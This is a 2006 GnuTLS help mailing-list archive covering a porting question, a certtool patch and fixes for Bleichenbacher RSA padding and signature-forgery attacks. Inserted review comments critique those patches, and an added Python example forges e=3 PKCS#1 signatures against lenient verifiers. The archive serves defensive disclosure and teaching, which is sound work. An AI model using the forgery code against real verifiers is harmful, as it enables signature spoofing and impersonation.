From evilynux at gmail.com Sat Sep 2 06:23:18 2006
From: evilynux at gmail.com (Pascal)
Date: Sat, 2 Sep 2006 00:23:18 -0400
Subject: [Help-gnutls] Guide/Doc on porting application from OpenSSL to GnuTLS
Message-ID: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com>

Hi,

As the Debian packager of mail-notification [1], I'm looking into the possibility of patching this application to use GnuTLS instead of OpenSSL. I reached a dead end trying to negotiate with the upstream author a long time ago [2]. Users (both Debian [2] and Ubuntu [3]) are still asking for SSL/TLS support (and I understand), so I decided to have a look and see if I could take action on this.

So I'm kindly asking for links to existing docs or tips for this kind of process. Any other relevant help is welcome.

Thanks,
-Pascal

[1] http://www.nongnu.org/mailnotify/
[2] http://bugs.debian.org/286672
[3] https://launchpad.net/distros/ubuntu/+source/mail-notification/+bug/44335

--
Homepage (http://organact.mine.nu)
Debian GNU/Linux (http://www.debian.org)

From daniel at haxx.se Sat Sep 2 12:59:55 2006
From: daniel at haxx.se (Daniel Stenberg)
Date: Sat, 2 Sep 2006 12:59:55 +0200 (CEST)
Subject: [Help-gnutls] Guide/Doc on porting application from OpenSSL to GnuTLS
In-Reply-To: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com>
References: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com>
Message-ID:

On Sat, 2 Sep 2006, Pascal wrote:

> I reached a dead end trying to negotiate with the upstream author a long
> time ago [2]. Users (both Debian [2] and Ubuntu [3]) are still asking for SSL/TLS
> support (and I understand), so I decided to have a look and see if I could
> take action on this.
>
> So I'm kindly asking for links to existing docs or tips for this kind of
> process. Any other relevant help is welcome.

I'm not sure it helps, but if it is client-side SSL you need, I've written support for both OpenSSL and GnuTLS in libcurl and they are interchangeable (at build time), so perhaps that could work as an example to look at?

--
-=- Daniel Stenberg -=- http://daniel.haxx.se -=-
ech`echo xiun|tr nu oc|sed 'sx\([s\x]\)\([\xoi]\)xo un\2\1 is xg'`ol

From evilynux at gmail.com Sat Sep 2 16:28:56 2006
From: evilynux at gmail.com (Pascal)
Date: Sat, 2 Sep 2006 10:28:56 -0400
Subject: [Help-gnutls] Guide/Doc on porting application from OpenSSL to GnuTLS
In-Reply-To:
References: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com>
Message-ID: <6ffb82fd0609020728g3d1262bdi7ccd6517dcf701df@mail.gmail.com>

On 9/2/06, Daniel Stenberg wrote:
> I'm not sure it helps, but if it is client-side SSL you need, I've written
> support for both OpenSSL and GnuTLS in libcurl and they are interchangeable (at
> build time), so perhaps that could work as an example to look at?

Hi Daniel,
indeed, it's client-side, I'll have a look.
I guess I should start by comparing lib/gtls.{h,c} and lib/ssl*.{h,c}?

-Pascal

--
Homepage (http://organact.mine.nu)
Debian GNU/Linux (http://www.debian.org)

From daniel at haxx.se Sat Sep 2 21:27:32 2006
From: daniel at haxx.se (Daniel Stenberg)
Date: Sat, 2 Sep 2006 21:27:32 +0200 (CEST)
Subject: [Help-gnutls] Guide/Doc on porting application from OpenSSL to GnuTLS
In-Reply-To: <6ffb82fd0609020728g3d1262bdi7ccd6517dcf701df@mail.gmail.com>
References: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com> <6ffb82fd0609020728g3d1262bdi7ccd6517dcf701df@mail.gmail.com>
Message-ID:

On Sat, 2 Sep 2006, Pascal wrote:

> indeed, it's client-side, I'll have a look. I guess I should start by
> comparing lib/gtls.{h,c} and lib/ssl*.{h,c}?

Yeps, within libcurl we have a generic SSL/TLS layer which is in sslgen.[ch], and only from there does it pick specific OpenSSL (ssluse.[ch]) or GnuTLS (gtls.[ch]) functions. It isn't 100% covering, but the concept works pretty well.

--
-=- Daniel Stenberg -=- http://daniel.haxx.se -=-
ech`echo xiun|tr nu oc|sed 'sx\([s\x]\)\([\xoi]\)xo un\2\1 is xg'`ol

From bradh at frogmouth.net Sun Sep 3 00:50:59 2006
From: bradh at frogmouth.net (Brad Hards)
Date: Sun, 3 Sep 2006 08:50:59 +1000
Subject: [Help-gnutls] Guide/Doc on porting application from OpenSSL to GnuTLS
In-Reply-To: <6ffb82fd0609020728g3d1262bdi7ccd6517dcf701df@mail.gmail.com>
References: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com> <6ffb82fd0609020728g3d1262bdi7ccd6517dcf701df@mail.gmail.com>
Message-ID: <200609030851.05070.bradh@frogmouth.net>

On Sunday 03 September 2006 00:28, Pascal wrote:
> On 9/2/06, Daniel Stenberg wrote:
> > I'm not sure it helps, but if it is client-side SSL you need, I've written
> > support for both OpenSSL and GnuTLS in libcurl and they are
> > interchangeable (at build time), so perhaps that could work as an example
> > to look at?
>
> Hi Daniel,
> indeed, it's client-side, I'll have a look.
> I guess I should start by comparing lib/gtls.{h,c} and lib/ssl*.{h,c}?

I would start by looking at the compatibility library. See:
http://www.gnu.org/software/gnutls/manual/html_node/Compatibility-with-the-OpenSSL-library.html

Brad

From evilynux at gmail.com Sun Sep 3 01:54:53 2006
From: evilynux at gmail.com (Pascal)
Date: Sat, 2 Sep 2006 19:54:53 -0400
Subject: [Help-gnutls] Guide/Doc on porting application from OpenSSL to GnuTLS
In-Reply-To: <200609030851.05070.bradh@frogmouth.net>
References: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com> <6ffb82fd0609020728g3d1262bdi7ccd6517dcf701df@mail.gmail.com> <200609030851.05070.bradh@frogmouth.net>
Message-ID: <6ffb82fd0609021654q3bd3e6afv98f7dca8e050a65a@mail.gmail.com>

Thanks Brad,
but the error handling is not thread safe which, IMHO, makes it unsuitable for Debian.

-Pascal

On 9/2/06, Brad Hards wrote:
> On Sunday 03 September 2006 00:28, Pascal wrote:
> > On 9/2/06, Daniel Stenberg wrote:
> > > I'm not sure it helps, but if it is client-side SSL you need, I've written
> > > support for both OpenSSL and GnuTLS in libcurl and they are
> > > interchangeable (at build time), so perhaps that could work as an example
> > > to look at?
> >
> > Hi Daniel,
> > indeed, it's client-side, I'll have a look.
> > I guess I should start by comparing lib/gtls.{h,c} and lib/ssl*.{h,c}?
> I would start by looking at the compatibility library. See:
> http://www.gnu.org/software/gnutls/manual/html_node/Compatibility-with-the-OpenSSL-library.html
>
> Brad

--
Homepage (http://organact.mine.nu)
Debian GNU/Linux (http://www.debian.org)

From bradh at frogmouth.net Sun Sep 3 02:19:29 2006
From: bradh at frogmouth.net (Brad Hards)
Date: Sun, 3 Sep 2006 10:19:29 +1000
Subject: [Help-gnutls] Guide/Doc on porting application from OpenSSL to GnuTLS
In-Reply-To: <6ffb82fd0609021654q3bd3e6afv98f7dca8e050a65a@mail.gmail.com>
References: <6ffb82fd0609012123n4a1b5442id1e93e9420250a59@mail.gmail.com> <200609030851.05070.bradh@frogmouth.net> <6ffb82fd0609021654q3bd3e6afv98f7dca8e050a65a@mail.gmail.com>
Message-ID: <200609031019.34329.bradh@frogmouth.net>

On Sunday 03 September 2006 09:54, Pascal wrote:
> Thanks Brad,
> but the error handling is not thread safe which, IMHO, makes it
> unsuitable for Debian.

Is MailNotifier actually threaded? I had a quick look at the code, and it didn't seem to be so.

BTW: I'm not sure why some aspect of a particular library not being thread safe (which is very common) would exclude it from Debian. You just have to be careful with the way in which you use it (e.g. most of Qt is not thread safe; you just have to make sure you only do certain operations from the GUI thread).

Brad

From sascha.ziemann at secunet.com Mon Sep 4 13:22:59 2006
From: sascha.ziemann at secunet.com (Sascha Ziemann)
Date: Mon, 04 Sep 2006 13:22:59 +0200
Subject: [Help-gnutls] Two organizational units
Message-ID: <44FC0C93.8080505@secunet.com>

Hi,

I would like to generate a certificate with more than one OU field in the subject. When I try to write two "unit=" entries in the template file, I get an error. What is the right way to do that?

Regards,
Ziemann

From jas at extundo.com Mon Sep 4 16:09:42 2006
From: jas at extundo.com (Simon Josefsson) Date: Mon, 04 Sep 2006 16:09:42 +0200 Subject: [Help-gnutls] Re: Two organizational units In-Reply-To: <44FC0C93.8080505@secunet.com> (Sascha Ziemann's message of "Mon, 04 Sep 2006 13:22:59 +0200") References: <44FC0C93.8080505@secunet.com> Message-ID: <87y7szwwnt.fsf@latte.josefsson.org> Sascha Ziemann writes: > Hi, > > I would like to generate a certificate with more than one OU field in > the subject. When I try to write two "unit=" entries in the template > file, I get an error. What is the right way to do that? Hi! I don't think that is supported right now. Could you test this patch? /Simon Index: certtool-cfg.c =================================================================== RCS file: /cvs/gnutls/gnutls/src/certtool-cfg.c,v retrieving revision 2.15 diff -u -p -r2.15 certtool-cfg.c --- certtool-cfg.c 15 May 2006 14:29:45 -0000 2.15 +++ certtool-cfg.c 4 Sep 2006 14:07:10 -0000 @@ -40,7 +40,7 @@ extern int batch; typedef struct _cfg_ctx { char *organization; - char *unit; + char **unit; char *locality; char *state; char *cn; @@ -93,7 +93,7 @@ template_parse (const char *template) struct cfg_option options[] = { {NULL, '\0', "organization", CFG_STR, (void *) &cfg.organization, 0}, - {NULL, '\0', "unit", CFG_STR, (void *) &cfg.unit, 0}, + {NULL, '\0', "unit", CFG_STR + CFG_MULTI, (void *) &cfg.unit, 0}, {NULL, '\0', "locality", CFG_STR, (void *) &cfg.locality, 0}, {NULL, '\0', "state", CFG_STR, (void *) &cfg.state, 0}, {NULL, '\0', "cn", CFG_STR, (void *) &cfg.cn, 0}, 
@@ -366,20 +366,24 @@ void get_unit_crt_set (gnutls_x509_crt crt) { int ret; + size_t i; if (batch) { if (!cfg.unit) return; - ret = - gnutls_x509_crt_set_dn_by_oid (crt, - GNUTLS_OID_X520_ORGANIZATIONAL_UNIT_NAME, - 0, cfg.unit, strlen (cfg.unit)); - if (ret < 0) + for (i = 0; cfg.unit[i] != NULL; i++) { - fprintf (stderr, "set_dn: %s\n", gnutls_strerror (ret)); - exit (1); + ret = + gnutls_x509_crt_set_dn_by_oid (crt, + GNUTLS_OID_X520_ORGANIZATIONAL_UNIT_NAME, + 0, cfg.unit[i], strlen (cfg.unit[i])); + if (ret < 0) + { + fprintf (stderr, "set_dn: %s\n", gnutls_strerror (ret)); + exit (1); + } } } else @@ -892,20 +896,24 @@ void get_unit_crq_set (gnutls_x509_crq crq) { int ret; + size_t i; if (batch) { if (!cfg.unit) return; - ret = - gnutls_x509_crq_set_dn_by_oid (crq, - GNUTLS_OID_X520_ORGANIZATIONAL_UNIT_NAME, - 0, cfg.unit, strlen (cfg.unit)); - if (ret < 0) + for (i = 0; cfg.unit[i] != NULL; i++) { - fprintf (stderr, "set_dn: %s\n", gnutls_strerror (ret)); - exit (1); + ret = + gnutls_x509_crq_set_dn_by_oid (crq, + GNUTLS_OID_X520_ORGANIZATIONAL_UNIT_NAME, + 0, cfg.unit[i], strlen (cfg.unit[i])); + if (ret < 0) + { + fprintf (stderr, "set_dn: %s\n", gnutls_strerror (ret)); + exit (1); + } } } else Index: certtool-cfg.h =================================================================== RCS file: /cvs/gnutls/gnutls/src/certtool-cfg.h,v retrieving revision 2.8 diff -u -p -r2.8 certtool-cfg.h --- certtool-cfg.h 7 Nov 2005 23:28:05 -0000 2.8 +++ certtool-cfg.h 4 Sep 2006 14:07:10 -0000 @@ -1,6 +1,6 @@ #include -extern char *organization, *unit, *locality, *state; +extern char *organization, **unit, *locality, *state; extern char *cn, *challenge_password, *password, *pkcs9_email, *country; extern char *dns_name, *email, *crl_dist_points, *pkcs12_key_name; extern int serial, expiration_days, ca, tls_www_client, tls_www_server, From jas at extundo.com Fri Sep 8 12:12:40 2006 
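Review bot: in the options-table hunk, `CFG_STR + CFG_MULTI` combines two flag values with addition; if these are bit flags the idiomatic and safer spelling is `CFG_STR | CFG_MULTI`, which cannot double-count a bit should the macros ever overlap.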
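Review bot: the get_unit_crt_set and get_unit_crq_set hunks both rely on cfgfile returning a NULL-terminated array for a CFG_MULTI string (`for (i = 0; cfg.unit[i] != NULL; i++)`); confirm that is the library's contract rather than a count-plus-array, or the loop reads past the end when the last entry is not NULL. The two loop bodies are identical apart from `gnutls_x509_crt_set_dn_by_oid` vs `gnutls_x509_crq_set_dn_by_oid`, so a small shared helper would avoid fixing the same code twice later. The `else` (interactive) branch is outside the hunk: after the header change to `char **unit`, any remaining use of `cfg.unit` there as a `char *` no longer compiles, and interactive mode still accepts only one OU.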
From: jas at extundo.com (Simon Josefsson)
Date: Fri, 08 Sep 2006 12:12:40 +0200
Subject: [Help-gnutls] Bleichenbacher RSA signature forgery attack and GnuTLS
Message-ID: <87lkoupsyv.fsf@latte.josefsson.org>

You may have heard about a neat attack by Daniel Bleichenbacher, described in:

http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html

I went over the GnuTLS code to review if it is vulnerable.

Signature verification starts in lib/x509/verify.c:_pkcs1_rsa_verify_sig, which calls lib/gnutls_pk.c:_gnutls_pkcs1_rsa_decrypt. It contains code like this:

  _gnutls_mpi_print (&edata[1], &esize, res);
  ...
  ret = GNUTLS_E_DECRYPTION_FAILED;
  switch (btype)
    {
    case 2:
      for (i = 2; i < esize; i++)
        {
          if (edata[i] == 0)
            {
              ret = 0;
              break;
            }
        }
      break;
    case 1:
      for (i = 2; i < esize; i++)
        {
          if (edata[i] == 0 && i > 2)
            {
              ret = 0;
              break;
            }
          if (edata[i] != 0xff)
            {
              _gnutls_handshake_log ("PKCS #1 padding error");
              ret = GNUTLS_E_PKCS1_WRONG_PAD;
              break;
            }
        }
      break;
    default:
      gnutls_assert ();
      gnutls_afree (edata);
      return GNUTLS_E_INTERNAL_ERROR;
    }

  i++;

  if (ret < 0)
    {
      gnutls_assert ();
      gnutls_afree (edata);
      return GNUTLS_E_DECRYPTION_FAILED;
    }

  if (_gnutls_sset_datum (plaintext, &edata[i], esize - i) < 0)
    {
      gnutls_assert ();
      gnutls_afree (edata);
      return GNUTLS_E_MEMORY_ERROR;
    }

Thus it will save the rest of the blob after the FFFF..FFFF00 sequence in "plaintext".

Now back in _pkcs1_rsa_verify_sig, it calls decode_ber_digest_info on "plaintext", which in turn calls libtasn1 (plaintext==info):

  result = asn1_der_decoding (&dinfo, info->data, info->size, NULL);
  if (result != ASN1_SUCCESS)
    {
      gnutls_assert ();
      asn1_delete_structure (&dinfo);
      return _gnutls_asn2err (result);
    }

The libtasn1 library checks that the decoded data is of the indicated length, so if "info" contains the correct ASN.1 blob plus some garbage, the entire decoding will fail.
See the end of asn1_der_decoding for the check that catches this: if (counter != len) { asn1_delete_structure (element); return ASN1_DER_ERROR; } Here, len is the "plaintext" length, and "counter" is the size of the ASN.1 structure that it computed by parsing the data. The conclusion is that GnuTLS isn't vulnerable to _exactly_ this attack. /Simon From jas at extundo.com Fri Sep 8 15:54:26 2006 From: jas at extundo.com (Simon Josefsson) Date: Fri, 08 Sep 2006 15:54:26 +0200 Subject: [Help-gnutls] Re: Bleichenbacher RSA signature forgery attack and GnuTLS In-Reply-To: <87lkoupsyv.fsf@latte.josefsson.org> (Simon Josefsson's message of "Fri\, 08 Sep 2006 12\:12\:40 +0200") References: <87lkoupsyv.fsf@latte.josefsson.org> Message-ID: <87wt8ewjjh.fsf@latte.josefsson.org> Simon Josefsson writes: > _gnutls_handshake_log ("PKCS #1 padding error"); > ret = GNUTLS_E_PKCS1_WRONG_PAD; Werner Koch points out that this error message may result in a vulnerability similar to Bleichenbacher's Crypto 98 attack. It is not exactly the same situation -- Bleichenbacher talks about PKCS#1 encryption (block type 1, uses random padding) where this deals with PKCS#1 verification (block type 2, uses 0xFF padding) -- but at a glance, it appears to have similar consequences, but differ in the number of messages required to mount the attack. The patch to solve this, which has been installed on GnuTLS 1.4.x and GnuTLS 1.5.x branches, is included below. I'll release 1.4.3 later today. /Simon Index: gnutls_pk.c =================================================================== RCS file: /cvs/gnutls/gnutls/lib/gnutls_pk.c,v retrieving revision 1.82 retrieving revision 1.83 diff -u -p -r1.82 -r1.83 --- gnutls_pk.c 15 Dec 2005 13:24:29 -0000 1.82 +++ gnutls_pk.c 8 Sep 2006 13:19:29 -0000 1.83 @@ -1,5 +1,5 @@ /* - * Copyright (C) 2001, 2002, 2003, 2004, 2005 Free Software Foundation + * Copyright (C) 2001, 2002, 2003, 2004, 2005, 2006 Free Software Foundation * * Author: Nikos Mavroyanopoulos * 
@@ -265,8 +265,13 @@ _gnutls_pkcs1_rsa_decrypt (gnutls_datum_ _gnutls_mpi_release (&res); - /* EB = 00||BT||PS||00||D + /* EB = 00||BT||PS||00||D * (use block type 'btype') + * + * From now on, return GNUTLS_E_DECRYPTION_FAILED on errors, to + * avoid attacks similar to the one described by Bleichenbacher in: + * "Chosen Ciphertext Attacks against Protocols Based on RSA + * Encryption Standard PKCS #1". */ @@ -303,8 +308,8 @@ _gnutls_pkcs1_rsa_decrypt (gnutls_datum_ } if (edata[i] != 0xff) { - _gnutls_handshake_log ("PKCS #1 padding error"); - ret = GNUTLS_E_PKCS1_WRONG_PAD; + /* PKCS #1 padding error. Don't use + GNUTLS_E_PKCS1_WRONG_PAD here. */ break; } } @@ -312,7 +317,6 @@ _gnutls_pkcs1_rsa_decrypt (gnutls_datum_ default: gnutls_assert (); gnutls_afree (edata); - return GNUTLS_E_INTERNAL_ERROR; } i++; From jas at extundo.com Fri Sep 8 17:26:01 2006 
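Review bot: in the `edata[i] != 0xff` hunk the early `break` is kept, so the number of loop iterations before rejection still depends on where the first bad padding byte sits; replacing the distinct error code removes the explicit oracle but leaves a timing one. If the goal is to give the caller (and, through it, the peer) no information at all, scan the whole buffer, fold each byte's result into a flag, and decide after the loop. The new comment in the first hunk describes the chosen-ciphertext attack on the block type 2 (encryption) path; since this function also serves block type 1 for signature verification, say that the uniform GNUTLS_E_DECRYPTION_FAILED covers both paths.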
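Review bot: in the `default:` hunk, deleting `return GNUTLS_E_INTERNAL_ERROR;` right after `gnutls_afree (edata);` makes the unknown-btype case fall through to `i++` and then into the `if (ret < 0)` block (quoted earlier in the thread), which calls `gnutls_afree (edata)` a second time: a double free on an internal misuse path. Either keep a return there (GNUTLS_E_DECRYPTION_FAILED if a uniform error is wanted) or drop the `gnutls_afree` from the default case and let the common error path free the buffer once.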
From: jas at extundo.com (Simon Josefsson)
Date: Fri, 08 Sep 2006 17:26:01 +0200
Subject: [Help-gnutls] GnuTLS 1.4.3
Message-ID: <87r6ymv0qe.fsf@latte.josefsson.org>

I am happy to announce GnuTLS 1.4.3, a security bugfix release on the stable 1.4 branch. This version is what we recommend for those who need a stable version of GnuTLS.

GnuTLS is a modern C library that implements the standard network security protocol Transport Layer Security (TLS), for use by network applications.

Noteworthy changes since 1.4.2:

** Fix PKCS#1 verification to avoid a variant of Bleichenbacher's
** Crypto 06 rump session attack.
In particular, we check that the digestAlgorithm.parameters field is empty, to avoid that it can contain "garbage" that may be used to alter the numeric properties of the signature. See (which is not exactly the same as the problem we fix here). Reported by Yutaka OIWA. See GNUTLS-SA-2006-4 on http://www.gnutls.org/security.html for more up to date information.

** Fix PKCS#1 decryption to avoid Bleichenbacher's Crypto 98 attack.
See . Reported by Werner Koch. See GNUTLS-SA-2006-3 on http://www.gnutls.org/security.html for more up to date information.

** Fix crash in gnutls_x509_crt_sign2 if passed a NULL issuer_key.

** API and ABI modifications:
No changes since last version.

Improving GnuTLS is costly, but you can help! We are looking for organizations that find GnuTLS useful and wish to contribute back. You can contribute by reporting bugs, improving the software, or donating money or equipment.

Commercial support contracts for GnuTLS are available, and they help finance continued maintenance. Simon Josefsson Datakonsult, a Stockholm based privately held company, is currently funding GnuTLS maintenance. We are always looking for interesting development projects. See http://josefsson.org/ for more details.
All manual formats are available from:
http://www.gnutls.org/manual/

Direct link to the most popular formats:
http://www.gnutls.org/manual/gnutls.html - HTML format
http://www.gnutls.org/manual/gnutls.pdf - PDF format
http://www.gnutls.org/reference/ch01.html - API Reference, GTK-DOC HTML

If you need help to use GnuTLS, or want to help others, you are invited to join our help-gnutls mailing list, see: .

The project page of the library is available at:
http://www.gnutls.org/
http://www.gnu.org/software/gnutls/
http://josefsson.org/gnutls/

Here are the compressed sources (3.9MB):
http://josefsson.org/gnutls/releases/gnutls-1.4.3.tar.bz2

Here are GPG detached signatures signed using key 0xB565716F:
http://josefsson.org/gnutls/releases/gnutls-1.4.3.tar.bz2.sig

The software is cryptographically signed by the author using an OpenPGP key identified by the following information:

pub   1280R/B565716F 2002-05-05 [expires: 2007-02-15]
uid                  Simon Josefsson
uid                  Simon Josefsson
sub   1280R/4D5D40AE 2002-05-05 [expires: 2007-02-15]
sub   1024R/09CC4670 2006-03-18 [expires: 2007-04-22]
sub   1024R/AABB1F7B 2006-03-18 [expires: 2007-04-22]
sub   1024R/A14C401A 2006-03-18 [expires: 2007-04-22]

The key is available from:
http://josefsson.org/key.txt
dns:b565716f.josefsson.org?TYPE=CERT

Here are the SHA-1 and SHA-224 checksums:

c4182c3804235d6f3eb2f3e59bb560f22370d4fc  gnutls-1.4.3.tar.bz2
b95c5be42a41050328c70a6bee0c5fe0df20274e  gnutls-1.4.3.tar.bz2.sig

7cd58744ba1a4628f75f2c9dda2d6af4fcbda28ba155e6afead3035e  gnutls-1.4.3.tar.bz2
b84e8452859d3c98575cd5a5a1f6d161dc4c4f63bc7803a4626425ef  gnutls-1.4.3.tar.bz2.sig

Enjoy,
Nikos and Simon

From jas at extundo.com Fri Sep 8 17:44:13 2006
From: jas at extundo.com (Simon Josefsson)
Date: Fri, 08 Sep 2006 17:44:13 +0200
Subject: [Help-gnutls] Variant of Bleichenbacher's crypto 06 rump session attack
Message-ID: <87fyf2uzw2.fsf@latte.josefsson.org>

The GNUTLS-SA-2006-4 security problem (fixed in 1.4.3) is a variant of Bleichenbacher's latest attack:

http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html

The difference is that it uses the digestAlgorithm.parameters field to store "garbage", rather than storing it after the ASN.1 blob. The optional parameters field is not used for MD5/SHA1, but instead of verifying that the field is not present, GnuTLS just ignored it. Therefore, it can be used to store garbage data in.

This problem was reported to us by Yutaka Oiwa, Kazukuni Kobara and Hajime Watanabe, and hopefully their original report with more background will be available soon.

The patch that fixes this is for lib/x509/verify.c, see below. This has been installed on the GnuTLS 1.5 branch, but I don't intend to release 1.5.1 soon. Try the nightly snapshots, or 1.4.3 instead.

/Simon

Update of /cvs/gnutls/gnutls/lib/x509
In directory trithemius:/tmp/cvs-serv3577

Modified Files:
      Tag: gnutls_1_4_x
	verify.c
Log Message:
Make sure the digestAlgorithm.parameters field is empty, which it has to be for the hashes we support. Otherwise, the field can encode "garbage" that might be used to make the signature be a perfect cube, similar (but not identical) to Bleichenbacher's Crypto 06 rump session attack.
--- /cvs/gnutls/gnutls/lib/x509/verify.c 2005/11/07 23:28:02 1.52 +++ /cvs/gnutls/gnutls/lib/x509/verify.c 2006/09/08 13:38:55 1.52.2.1 -1,5 +1,5 /* - * Copyright (C) 2003, 2004, 2005 Free Software Foundation + * Copyright (C) 2003, 2004, 2005, 2006 Free Software Foundation * * Author: Nikos Mavroyanopoulos * -505,6 +505,15 return GNUTLS_E_UNKNOWN_HASH_ALGORITHM; } + len = sizeof (str) - 1; + result = asn1_read_value (dinfo, "digestAlgorithm.parameters", NULL, &len); + if (result != ASN1_ELEMENT_NOT_FOUND) + { + gnutls_assert (); + asn1_delete_structure (&dinfo); + return _gnutls_asn2err (result); + } + result = asn1_read_value (dinfo, "digest", digest, digest_size); if (result != ASN1_SUCCESS) { From jas at extundo.com Mon Sep 11 15:14:48 2006 
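Review bot: the new `digestAlgorithm.parameters` check in this hunk rejects a present-but-empty field along with a garbage one. For the common encoding of SHA-1/MD5 parameters as a DER NULL (`05 00`), `asn1_read_value` with a NULL buffer reports the required length (ASN1_MEM_ERROR with `len` set) rather than ASN1_ELEMENT_NOT_FOUND, so signatures from signers that emit the NULL are refused. Read the value into a small buffer and accept either ASN1_ELEMENT_NOT_FOUND or a value equal to the two-byte NULL, rejecting everything else. Two smaller points: `len = sizeof (str) - 1;` is assigned but, with a NULL buffer, only serves as an output, and `_gnutls_asn2err (result)` on the present-field path maps a non-error libtasn1 code into the error return; return an explicit DER/verification error there instead.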
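The two holes discussed in this thread, trailing data after the DigestInfo (Simon's analysis earlier) and garbage inside digestAlgorithm.parameters (GNUTLS-SA-2006-4), as an added Python example that is not GnuTLS or libtasn1 code. It builds both e=3 forgeries and runs them through three verifier shapes: trailing-data tolerant, length-checked but parameters-ignoring, and parameters-checked. Assumptions: SHA-256 stands in for the MD5/SHA-1 of the original discussion; N is a constructed 2048-bit odd number, not a real key, which suffices because the forged s satisfies s^3 < N and the public operation never reduces; the message text is made up; Python 3.8+ is needed for pow(3, -1, m).

```python
import hashlib

SHA256_OID = bytes.fromhex("608648016503040201")  # 2.16.840.1.101.3.4.2.1 (value bytes)
NULL_PARAMS = b"\x05\x00"                         # DER NULL, the one legal present params
N = (1 << 2047) | (0xC0FFEE << 1000) | 1          # constructed modulus, NOT a real RSA key
E = 3


def der(tag, content):                            # one TLV with definite, minimal length
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


def tlv(buf, pos):                                # decode one TLV -> (tag, content, end)
    if pos + 2 > len(buf):
        raise ValueError("truncated")
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        nb = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + nb], "big"), pos + nb
    if pos + ln > len(buf):
        raise ValueError("truncated")
    return tag, buf[pos:pos + ln], pos + ln


def digest_info(digest, params=NULL_PARAMS):
    """DigestInfo ::= SEQUENCE { SEQUENCE { OID, params }, OCTET STRING digest }"""
    return der(0x30, der(0x30, der(0x06, SHA256_OID) + params) + der(0x04, digest))


def parse_digest_info(buf, allow_trailing):
    """-> (oid, params or None, digest); allow_trailing=False is libtasn1's counter != len check."""
    tag, seq, end = tlv(buf, 0)
    if tag != 0x30 or (end != len(buf) and not allow_trailing):
        raise ValueError("bad DigestInfo")
    tag, alg, p = tlv(seq, 0)
    tag2, digest, p2 = tlv(seq, p)
    tag3, oid, q = tlv(alg, 0)
    if tag != 0x30 or tag2 != 0x04 or p2 != len(seq) or tag3 != 0x06:
        raise ValueError("bad DigestInfo")
    return oid, (alg[q:] if q < len(alg) else None), digest


def strip_type1_padding(n, e, sig):
    """EB = 00 || 01 || FF..FF (at least 8) || 00 || D; returns D, or None on bad padding."""
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if em[:2] != b"\x00\x01" or i < 10 or i == k or em[i] != 0:
        return None
    return em[i + 1:]


def verify(n, e, sig, msg, allow_trailing, check_params):
    """allow_trailing=True is the Bleichenbacher '06 hole; check_params=False ignores
    digestAlgorithm.parameters, which is the GNUTLS-SA-2006-4 variant."""
    info = strip_type1_padding(n, e, sig)
    if info is None:
        return False
    try:
        oid, params, digest = parse_digest_info(info, allow_trailing)
    except ValueError:
        return False
    if check_params and params not in (None, NULL_PARAMS):
        return False
    return oid == SHA256_OID and digest == hashlib.sha256(msg).digest()


def icbrt_ceil(x):                                # smallest s with s**3 >= x
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3)
    while lo < hi:
        mid = (lo + hi) // 2
        lo, hi = (lo, mid) if mid ** 3 >= x else (mid + 1, hi)
    return lo


def forge_trailing(n, msg):
    """Garbage AFTER DigestInfo: zero-fill, take the ceiling cube root; the rounding error
    (below 2**1360 for k=256) stays inside the 194 garbage bytes, so the head survives."""
    k = (n.bit_length() + 7) // 8
    head = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(hashlib.sha256(msg).digest())
    s = icbrt_ceil(int.from_bytes(head.ljust(k, b"\x00"), "big"))
    assert s ** 3 < n                             # so pow(s, 3, n) == s**3 exactly
    return s.to_bytes(k, "big")


def forge_in_params(n, msg):
    """Garbage INSIDE parameters, with DigestInfo sized to fill EM exactly (length check passes).
    The tail 04 20 || digest must survive, so s is chosen with s**3 == tail mod 2**t; cubing is a
    bijection on odd residues mod 2**t, hence the attacker picks a message with an odd last byte."""
    k = (n.bit_length() + 7) // 8
    digest = hashlib.sha256(msg).digest()
    tail = der(0x04, digest)
    assert tail[-1] & 1, "need a digest ending in an odd byte"
    info = next(i for i in (digest_info(digest, der(0x04, b"\x00" * p)) for p in range(k))
                if len(i) == k - 11)
    target = int.from_bytes(b"\x00\x01" + b"\xff" * 8 + b"\x00" + info, "big")
    t, d = 8 * len(tail), int.from_bytes(tail, "big")
    s_low = pow(d, pow(3, -1, 1 << (t - 1)), 1 << t)       # cube root of the tail mod 2**t
    s = (((icbrt_ceil(target) >> t) + 1) << t) + s_low     # high part rounded up, low part fixed
    assert s ** 3 < n and s ** 3 % (1 << t) == d
    return s.to_bytes(k, "big")


def demo():
    """Forge for a message of the attacker's choice (constructed) and run every verifier shape."""
    msg = next(m for m in (b"pay 100 EUR to Mallory, ref %d" % i for i in range(256))
               if hashlib.sha256(m).digest()[-1] & 1)
    f1, f2 = forge_trailing(N, msg), forge_in_params(N, msg)
    return {"trailing/lenient": verify(N, E, f1, msg, True, False),        # forged: True
            "trailing/length-checked": verify(N, E, f1, msg, False, False),
            "params/length-checked": verify(N, E, f2, msg, False, False),  # forged: True
            "params/params-checked": verify(N, E, f2, msg, False, True)}
```

The second forgery is the reason the length check alone is not enough: once the garbage lives inside a field the parser accepts, libtasn1's counter != len test is satisfied, and only an explicit rule for the parameters field (absent, or exactly a DER NULL) closes it. The shape that avoids parsing attacker bytes altogether is to rebuild the single expected encoded message from the public key length and the message hash and compare it byte for byte, which is what later PKCS#1 guidance recommends.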
From: jas at extundo.com (Simon Josefsson)
Date: Mon, 11 Sep 2006 15:14:48 +0200
